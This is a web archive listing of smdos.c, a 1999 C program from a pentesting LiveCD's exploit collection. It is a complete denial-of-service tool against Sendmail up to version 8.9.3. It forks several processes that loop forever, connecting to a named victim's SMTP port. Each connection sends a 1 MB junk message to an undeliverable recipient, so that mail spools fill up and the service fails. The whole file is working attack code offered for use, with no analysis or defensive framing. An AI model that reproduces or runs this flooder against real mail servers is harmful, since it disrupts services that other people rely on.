home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / smdos.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  4KB  |  178 lines
  1. /*
  2.   By Michal Szymanski <siwa9@box43.gnet.pl>
  3.   Sendmail DoS (up to 8.9.3);
  4.   Sat Apr  3 00:12:31 CEST 1999
  5. */
  6.  
  7. #include <stdio.h>
  8. #include <sys/types.h>
  9. #include <sys/socket.h>
  10. #include <netinet/in.h>
  11. #include <arpa/inet.h>
  12. #include <netdb.h>
  13. #include <errno.h>
  14.  
  15. #undef VERBOSE          /* define it, if MORECONN is undefined */
  16.  
  17. #define MORECONN
  18.  
  19. // #define RCPT_TO      "foo@ftp.onet.pl"
  20.  
  21. #define RCPT_TO "foo@10.255.255.255"
  22.  
  23. #ifdef MORECONN
  24. #define MAXCONN 5
  25. #endif
  26.  
  27. #define BSIZE   1048576         /* df* control file size */
  28. #define PORT    25
  29.  
  30. char buffer[BSIZE];
  31. int sockfd,x,loop,chpid;
  32.  
  33. void usage(char *fname)
  34. {
  35.   fprintf(stderr,"Usage: %s <victim_host>\n",fname);
  36.   exit(1);
  37. }
  38.  
  39. void say(char *what)
  40. {
  41.  
  42.   if (write(sockfd,what,strlen(what))<0)
  43.     {
  44.       perror("write()");
  45.       exit(errno);
  46.     }
  47.  
  48. #ifdef VERBOSE
  49.   fprintf(stderr,"<%s",what);
  50. #endif
  51.  
  52.   bzero(buffer,BSIZE);
  53.  
  54.   usleep(1000);
  55.  
  56.   if (read(sockfd,buffer,BSIZE)<0)
  57.     {
  58.       perror("read()");
  59.       exit(errno);
  60.     }
  61.  
  62. #ifdef VERBOSE
  63.   fprintf(stderr,buffer);
  64. #endif
  65. }
  66.  
  67.  
  68. int main(int argc,char *argv[])
  69. {
  70.   struct sockaddr_in serv_addr;
  71.   struct hostent *host;
  72.   char *hostname,hostaddr[20];
  73.  
  74.   fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9 [siwa9@box43.gnet.pl]\n");
  75.  
  76.   if (argc<2) usage(argv[0]);
  77.  
  78. #ifdef VERBOSE
  79.   fprintf(stderr,">Preparing address. \n");
  80. #endif
  81.  
  82.   hostname=argv[1];
  83.  
  84.   serv_addr.sin_port=htons(PORT);
  85.   serv_addr.sin_family=AF_INET;
  86.  
  87.   if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1)
  88.     {
  89.  
  90. #ifdef VERBOSE
  91.       fprintf(stderr,">Getting info from DNS.\n");
  92. #endif
  93.  
  94.       if ((host=gethostbyname(hostname))==NULL)
  95.         {
  96.           herror("gethostbyname()");
  97.           exit(h_errno);
  98.         }
  99.  
  100.       serv_addr.sin_family=host->h_addrtype;
  101.  
  102.       bcopy(host->h_addr,(char *)&serv_addr.sin_addr,host->h_length);
  103.  
  104. #ifdef VERBOSE
  105.       fprintf(stderr,">Official name of host: %s\n",host->h_name);
  106. #endif
  107.  
  108.       hostname=host->h_name;
  109.  
  110.       sprintf(hostaddr,"%d.%d.%d.%d",(unsigned char)host->h_addr[0],
  111.               (unsigned char)host->h_addr[1],
  112.               (unsigned char)host->h_addr[2],
  113.               (unsigned char)host->h_addr[3]);
  114.  
  115.     }
  116.   else sprintf(hostaddr,"%s",hostname);
  117.  
  118. #ifdef MORECONN
  119.   for (;loop<MAXCONN;loop++) if (!(chpid=fork()))
  120.       {
  121. #endif
  122.  
  123.         for(;;)
  124.           {
  125.  
  126.             bzero(&(serv_addr.sin_zero),8);
  127.  
  128.             if ((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
  129.               {
  130.                 perror("socket()");
  131.                 exit(errno);
  132.               }
  133.  
  134.             if ((connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr))) == -1)
  135.               {
  136.                 perror("connect()");
  137.                 exit(errno);
  138.               }
  139.  
  140. #ifdef VERBOSE
  141.             fprintf(stderr,">Connected to [%s:%d].\n",hostname,PORT);
  142. #endif
  143.  
  144.             bzero(buffer,BSIZE);
  145.             read(sockfd,buffer,BSIZE);
  146. #ifdef VERBOSE
  147.             fprintf(stderr,buffer);
  148. #else
  149.             fprintf(stderr,".");
  150. #endif
  151.  
  152.             say("helo foo\n");
  153.             say("mail from:root@localhost\n");
  154.             say("rcpt to:" RCPT_TO "\n");
  155.             say("data\n");
  156.  
  157.             for (x=0;x<=BSIZE;x++) buffer[x]='X';
  158.             write(sockfd,buffer,BSIZE);
  159.  
  160.             say("\n.\n");
  161.             sleep(1);
  162.             say("quit\n");
  163.  
  164.             shutdown(sockfd,2);
  165.  
  166.             close(sockfd);
  167.  
  168. #ifdef VERBOSE
  169.             fprintf(stderr,">Connection closed succesfully.\n");
  170. #endif
  171.           }
  172. #ifdef MORECONN
  173.       }
  174.   waitpid(chpid,NULL,0);
  175. #endif
  176.   return 0;
  177. }
  178. /*                    www.hack.co.za              [2000]*/